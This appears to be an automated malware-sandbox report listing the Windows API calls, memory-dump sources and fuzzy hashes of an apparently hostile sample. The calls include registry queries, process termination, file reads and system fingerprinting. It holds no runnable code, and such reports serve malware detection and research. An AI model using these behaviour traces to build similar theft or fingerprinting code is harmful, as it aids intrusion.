                                                      • lstrlenA.KERNEL32(00000000), ref: 00417FB1
                                                      • lstrcpy.KERNEL32(00000000,00000000), ref: 00417FE0
                                                      • strtok_s.MSVCRT ref: 00417FF1
                                                      • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418025
                                                      • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418053
                                                      • StrCmpCA.SHLWAPI(00000000,00435204), ref: 00418087
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: strtok_s$lstrcpylstrlen
                                                      • String ID:
                                                      • API String ID: 348468850-0
                                                      • Opcode ID: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
                                                      • Instruction ID: 476cfacc260c43b9b6707cb97608d97a847e356c1d56728458ea849191fa1f26
                                                      • Opcode Fuzzy Hash: 0c468244a8143168505cd9d6d1ab1f94799bd3f5708272a995eed29db236200c
                                                      • Instruction Fuzzy Hash: D0417F34A0450ADFCB21DF18D884EEB77B4FF44304F12409AE805AB351DB79AAA6CF95
                                                      APIs
                                                      • memset.MSVCRT ref: 009F47A1
                                                      • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,?,?,009E558F), ref: 009F47CC
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009F47D3
                                                      • wsprintfW.USER32 ref: 009F47E2
                                                      • OpenProcess.KERNEL32(00001001,00000000,?,?), ref: 009F4851
                                                      • TerminateProcess.KERNEL32(00000000,00000000,?,?), ref: 009F4860
                                                      • CloseHandle.KERNEL32(00000000,?,?), ref: 009F4867
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
                                                      • String ID:
                                                      • API String ID: 3729781310-0
                                                      • Opcode ID: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
                                                      • Instruction ID: 2484b543db148752e453d3cf578facd951b24089800f91eae9841beeb2ce7a63
                                                      • Opcode Fuzzy Hash: f294a9282a179aaf91779889443061928891274dba70d803f1520c29df2745ed
                                                      • Instruction Fuzzy Hash: D9316D71A00209BBEB20DFE4DC89FEEB77DAF45741F104059FA05E7180DBB4AA418BA5
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417DD8
                                                        • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                        • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417DF6
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 00417E11
                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00417CFA,00000000,?,?,00000000,?,004091B6,?), ref: 00417E74
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$Exception@8Throwmemcpystd::exception::exception
                                                      • String ID: invalid string position$string too long
                                                      • API String ID: 702443124-4289949731
                                                      • Opcode ID: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                      • Instruction ID: 79f032b162a4ed5f1b8d8c3a7f5ff0854d2ec62b836a1cb7fb32b648417a52a7
                                                      • Opcode Fuzzy Hash: f8e74443709f6fd1f3a4696463b8f0e4265ac4588280398e2d67d3aa4e5e97cf
                                                      • Instruction Fuzzy Hash: 5921C3323047008BD7249E2CE980B6AB7F5AF95720F604A6FF4968B381D775DC8187A9
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 004088B3
                                                        • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                        • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                      • String ID: vector<T> too long$yxxx$yxxx$x@$x@
                                                      • API String ID: 2884196479-4254290729
                                                      • Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                      • Instruction ID: 642d6f8d25606cb57c5c368211f8c71801378994f2d8b98954bdbb6ac3618ebc
                                                      • Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                      • Instruction Fuzzy Hash: 3F31B7B5E005159BCB08DF58C9906AEBBB6EB88310F14827EE905EB385DB34A901CBD5
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009F2A9C
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009F2AA3
                                                        • Part of subcall function 009F2B17: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 009F2B2C
                                                        • Part of subcall function 009F2B17: RtlAllocateHeap.NTDLL(00000000), ref: 009F2B33
                                                        • Part of subcall function 009F2B17: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,009F2AB0), ref: 009F2B52
                                                        • Part of subcall function 009F2B17: RegQueryValueExA.ADVAPI32(009F2AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 009F2B6C
                                                        • Part of subcall function 009F2B17: RegCloseKey.ADVAPI32(009F2AB0), ref: 009F2B76
                                                      • RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,009E97C7), ref: 009F2AD8
                                                      • RegQueryValueExA.ADVAPI32(009E97C7,00638C34,00000000,00000000,00000000,000000FF), ref: 009F2AF3
                                                      • RegCloseKey.ADVAPI32(009E97C7), ref: 009F2AFD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                      • String ID: Windows 11
                                                      • API String ID: 3225020163-2517555085
                                                      • Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                      • Instruction ID: 349ef658ffb4b97ec27b3b58e6dd89c88c313124a64da9a4ec61afd44dd974a5
                                                      • Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                      • Instruction Fuzzy Hash: 3B01AD71640309BFDB149BA4AC89FFA7B7EEB44315F000159FE09D3290DAB09D448BE0
                                                      APIs
                                                        • Part of subcall function 009D7977: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 009D79AC
                                                        • Part of subcall function 009D7977: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 009D79F1
                                                        • Part of subcall function 009D7977: strlen.MSVCRT ref: 009D7A25
                                                        • Part of subcall function 009D7977: StrStrA.SHLWAPI(?,0043508C), ref: 009D7A5F
                                                        • Part of subcall function 009D7977: strcpy_s.MSVCRT ref: 009D7A88
                                                        • Part of subcall function 009D7977: GetProcessHeap.KERNEL32(00000000,00000000), ref: 009D7A93
                                                        • Part of subcall function 009D7977: HeapFree.KERNEL32(00000000), ref: 009D7A9A
                                                        • Part of subcall function 009D7977: strlen.MSVCRT ref: 009D7AA7
                                                      • lstrcat.KERNEL32(00638E68,0043509C), ref: 009D7C37
                                                      • lstrcat.KERNEL32(00638E68,?), ref: 009D7C64
                                                      • lstrcat.KERNEL32(00638E68,004350A0), ref: 009D7C76
                                                      • lstrcat.KERNEL32(00638E68,?), ref: 009D7C97
                                                      • wsprintfA.USER32 ref: 009D7CB7
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009D7CE0
                                                      • lstrcat.KERNEL32(00638E68,00000000), ref: 009D7CEE
                                                      • lstrcat.KERNEL32(00638E68,0043509C), ref: 009D7D07
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                      • String ID:
                                                      • API String ID: 2460923012-0
                                                      • Opcode ID: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
                                                      • Instruction ID: c8d91c0d311618b8e66b2a8fc8de2cf2ed64cca2ecdf0ac9c73d07f4b4dd0a71
                                                      • Opcode Fuzzy Hash: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
                                                      • Instruction Fuzzy Hash: FB31B572A54214EFCB14DBB4DC44AAAF77AFB88314F24951AF64993350EB74E940CBA0
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 009F61C1
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 009F61E0
                                                      • memmove.MSVCRT(FFFFFFFF,00000000,00000000,?,?,00000000), ref: 009F623B
                                                      • memcpy.MSVCRT(00000010,?,?), ref: 009F625F
                                                      • memcpy.MSVCRT(00000000,?,?), ref: 009F6274
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 009F6367
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xinvalid_argumentstd::_$memcpy$memmove
                                                      • String ID:
                                                      • API String ID: 1795094292-0
                                                      • Opcode ID: f44e9e1724c6da771fc665a3531611520f0502b6d9b36b20f8faa41871339d50
                                                      • Instruction ID: 8d7a5e2b32580d5ad6a3b204aea4c545e236eae4729ac9e1b2988455d92209a0
                                                      • Opcode Fuzzy Hash: f44e9e1724c6da771fc665a3531611520f0502b6d9b36b20f8faa41871339d50
                                                      • Instruction Fuzzy Hash: 286170307103099BDB28CF9CC995ABEB7B6EF85304B644919E6A2C7381D770ED419B94
                                                      APIs
                                                      • memset.MSVCRT ref: 009DA136
                                                      • LocalAlloc.KERNEL32(00000040), ref: 009DA16E
                                                        • Part of subcall function 009F7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 009F7495
                                                      • lstrcpy.KERNEL32(00000000,0043520C), ref: 009DA279
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcpy$AllocLocalmemset
                                                      • String ID: @$@"C
                                                      • API String ID: 4098468873-2306624759
                                                      • Opcode ID: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
                                                      • Instruction ID: 1e752e0daa569c1112f2472ee8ec5beb8dc6bf2d4a31fd7958fef466df9bde4e
                                                      • Opcode Fuzzy Hash: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
                                                      • Instruction Fuzzy Hash: 24510471A402489BDB10EFA4DC81BAE7BA8EF94318F148467F918AB351D774ED11CB80
                                                      APIs
                                                      • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 009EEDF2
                                                      • lstrcpy.KERNEL32(00000000,?), ref: 009EEE27
                                                      • lstrcat.KERNEL32(?,00000000), ref: 009EEE33
                                                      • lstrcat.KERNEL32(?,00431D64), ref: 009EEE4A
                                                      • lstrcat.KERNEL32(?,00638DF8), ref: 009EEE5B
                                                      • lstrcat.KERNEL32(?,00431D64), ref: 009EEE6B
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: lstrcat$FolderPathlstrcpy
                                                      • String ID:
                                                      • API String ID: 818526691-0
                                                      • Opcode ID: bc7e0632fca65abe3c63a7a274d646b798d9d3e00812ea250c76545d3e573360
                                                      • Instruction ID: ad2e5b01f925bdf013dec3ed17f668ead90c992bb0750368a92b4702635207d2
                                                      • Opcode Fuzzy Hash: bc7e0632fca65abe3c63a7a274d646b798d9d3e00812ea250c76545d3e573360
                                                      • Instruction Fuzzy Hash: DF417C71644244AFC314EF24DC46BEA77E5EFD9304F00C82AB95987291DE74E908DBA2
                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004012EE), ref: 00409AFA
                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004012EE), ref: 00409B10
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,004012EE), ref: 00409B27
                                                      • ReadFile.KERNEL32(00000000,00000000,?,004012EE,00000000,?,?,?,004012EE), ref: 00409B40
                                                      • LocalFree.KERNEL32(?,?,?,?,004012EE), ref: 00409B60
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,004012EE), ref: 00409B67
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                      • String ID:
                                                      • API String ID: 2311089104-0
                                                      • Opcode ID: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
                                                      • Instruction ID: d5e2846254d17b4b79341e9ac440d2f7db04c9e9ad0a28dbd651dd387858d46a
                                                      • Opcode Fuzzy Hash: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
                                                      • Instruction Fuzzy Hash: 06114C71A00209AFE7109FA5ED84ABB737DFB04750F10016AB904A72C1EB78BD408BA8
                                                      APIs
                                                      • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,009D1555), ref: 009D9D61
                                                      • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,009D1555), ref: 009D9D77
                                                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,009D1555), ref: 009D9D8E
                                                      • ReadFile.KERNEL32(00000000,00000000,?,009D1555,00000000,?,?,?,009D1555), ref: 009D9DA7
                                                      • LocalFree.KERNEL32(?,?,?,?,009D1555), ref: 009D9DC7
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,009D1555), ref: 009D9DCE
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                      • String ID:
                                                      • API String ID: 2311089104-0
                                                      • Opcode ID: 037b2ed9aec129e54901a5306ec9d4c93cee606d009a71b02df5ca158d82cdb5
                                                      • Instruction ID: 6fa689d84ec794a57bc61c2f5bc62e3d5459b6c28301697f00d05a180d36195d
                                                      • Opcode Fuzzy Hash: 037b2ed9aec129e54901a5306ec9d4c93cee606d009a71b02df5ca158d82cdb5
                                                      • Instruction Fuzzy Hash: 60112BB1640209AFEB10EFA9DC84EBA777EEB08744F10865AF911972C0DB709D408BA0
                                                      APIs
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                        • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                        • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                      • std::_Xinvalid_argument.LIBCPMT ref: 004089FD
                                                        • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                        • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                      • memcpy.MSVCRT(?,00000000,?,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408A5B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933389004.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.1933389004.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000496000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004AF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CC000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000004CF000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000506000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000513000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000532000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000540000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000055B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000596000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.00000000005B9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000008.00000002.1933389004.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
                                                      • String ID: invalid string position$string too long
                                                      • API String ID: 2202983795-4289949731
                                                      • Opcode ID: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
                                                      • Instruction ID: 649aac53c67e3ee9f5cf0101b70db7c319c758bc323567c03d989288a4630d66
                                                      • Opcode Fuzzy Hash: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
                                                      • Instruction Fuzzy Hash: 0721F6723006108BC720AA5CEA40A6BF7A9DBA1760B20093FF181DB7C1DA79D841C7ED
                                                      APIs
                                                      • memcpy.MSVCRT(?,004074D0,00000040,009D7634), ref: 009D70A7
                                                      • memcpy.MSVCRT(?,00005A4D,000000F8,00000000), ref: 009D70E3
                                                      • GetProcessHeap.KERNEL32(00000008,?), ref: 009D711B
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009D7122
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heapmemcpy$AllocateProcess
                                                      • String ID: @
                                                      • API String ID: 966719176-2766056989
                                                      • Opcode ID: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
                                                      • Instruction ID: fd35aa5fca6206fa3320b136698f3226cf340c92f4247b982da965cf8650aee1
                                                      • Opcode Fuzzy Hash: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
                                                      • Instruction Fuzzy Hash: E42181706447019BDB248BA0CC84BBBB3E8FB40705F84866DE956CB780F7B4E945CBA0
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 009F2E49
                                                      • RtlAllocateHeap.NTDLL(00000000), ref: 009F2E50
                                                      • GetTimeZoneInformation.KERNEL32(?), ref: 009F2E5F
                                                      • wsprintfA.USER32 ref: 009F2E8A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.1933997313.00000000009D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_9d0000_DADE.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Heap$AllocateInformationProcessTimeZonewsprintf
